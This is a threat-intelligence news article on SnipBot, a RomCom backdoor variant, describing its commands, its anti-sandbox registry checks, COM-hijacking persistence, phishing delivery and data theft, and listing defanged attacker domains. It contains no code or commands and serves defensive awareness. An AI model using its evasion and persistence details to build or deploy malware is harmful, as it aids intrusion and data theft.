A newly identified variant of the RomCom malware, named SnipBot, has been leveraged in attacks that exploit network vulnerabilities to extract data from compromised systems.
Researchers from Palo Alto Networks' Unit 42 uncovered SnipBot after scrutinizing a dynamic link library (DLL) module associated with its attacks. The latest SnipBot campaigns appear to target diverse sectors, including IT services, legal, and agriculture, focusing on data theft and lateral movement within networks.
RomCom serves as a backdoor, historically used to deploy Cuba ransomware in multiple malvertising campaigns and targeted phishing operations. The prior version, referred to as RomCom 4.0 by Trend Micro researchers in late 2023, was designed to be lighter and more discreet while maintaining a robust command set. Capabilities included command execution, file theft, payload delivery, registry modification, and secure TLS protocol usage for command and control (C2) communications.
Unit 42 considers SnipBot to be RomCom 5.0, enhancing its operational capabilities with an expanded set of 27 commands. This new version allows for precise data exfiltration control, targeting specific file types or directories, compressing stolen data with the 7-Zip archiving tool, and introducing archive payloads for evasion on the host system. SnipBot also implements window message-based control flow obfuscation, organizing its code into sequentially triggered blocks.
New anti-sandboxing techniques include performing hash checks on the executable and processes, and verifying a minimum of 100 entries in the "RecentDocs" and 50 sub-keys in the "Shell Bags" registry keys. Notably, SnipBot's main module, "single.dll," is encrypted in the Windows Registry and loaded into memory, while additional modules like "keyprov.dll" are decrypted and executed similarly.
Unit 42 was able to analyze attack artifacts sourced from VirusTotal submissions, tracing back to the initial infection vector for SnipBot. The typical attack sequence begins with phishing emails that contain links to seemingly benign files, such as PDFs, designed to entice recipients into clicking.
Researchers noted an older initial vector involving a fraudulent Adobe site prompting victims to download a missing font required to read an attached PDF. This process triggers multiple redirects through domains controlled by the attackers (e.g., "fastshare[.]click," "docstorage[.]link," and "publicshare[.]link"), ultimately delivering a malicious executable downloader from file-sharing sites like "temp[.]sh." These downloaders are often signed with legitimate certificates to evade security alerts when executing DLL files from the C2 server.
A common technique for loading these malicious payloads involves COM hijacking to inject them into "explorer.exe," ensuring persistence across system reboots. Once a system is compromised, attackers gather information on the company network and domain controller before extracting targeted files from the Documents, Downloads, and OneDrive directories.
Following the initial data theft, a second reconnaissance phase occurs using the AD Explorer utility, which enables navigation and modification of Active Directory (AD) databases. Data exfiltration is conducted using the PuTTY Secure Copy client after the data has been archived with WinRAR.
While the specific motivations behind the SnipBot and RomCom attacks remain ambiguous, Unit 42 suspects a shift in the threat actor's objectives from financial gain to potential espionage operations, given the range of targeted victims.
